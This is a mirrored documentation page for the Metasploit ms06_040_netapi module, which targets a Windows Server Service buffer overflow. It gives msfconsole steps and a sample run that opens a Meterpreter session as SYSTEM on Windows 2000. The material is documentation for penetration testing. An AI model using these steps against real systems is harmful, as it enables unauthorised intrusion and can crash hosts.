CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/smb/ms06_040_netapi.md
Views: 1904

Vulnerable Application

This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.

Verification Steps

  1. Start msfconsole

  2. Do: use modules/exploits/windows/smb/ms06_040_netapi

  3. Do: set RHOSTS [IP]

  4. Do: set PAYLOAD [payload]

  5. Do: set LHOST [IP]

  6. Do: set LPORT [port]

  7. Do: run

Scenarios

A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3

msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi
msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2
msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(windows/smb/ms06_040_netapi) > exploit

  [*] 192.168.1.2:445 - Detected a Windows 2000 target
  [*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
  [*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
  [*] 192.168.1.2:445 - Building the stub data...
  [*] 192.168.1.2:445 - Calling the vulnerable function...
  [*] Started bind TCP handler against 192.168.1.2:4444
  [*] Sending stage (180291 bytes) to 192.168.1.2
  [*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700


meterpreter > sysinfo
  Computer        : PC-B43791F5F5
  OS              : Windows 2000 (5.0 Build 2195).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 1
  Meterpreter     : x86/windows

meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM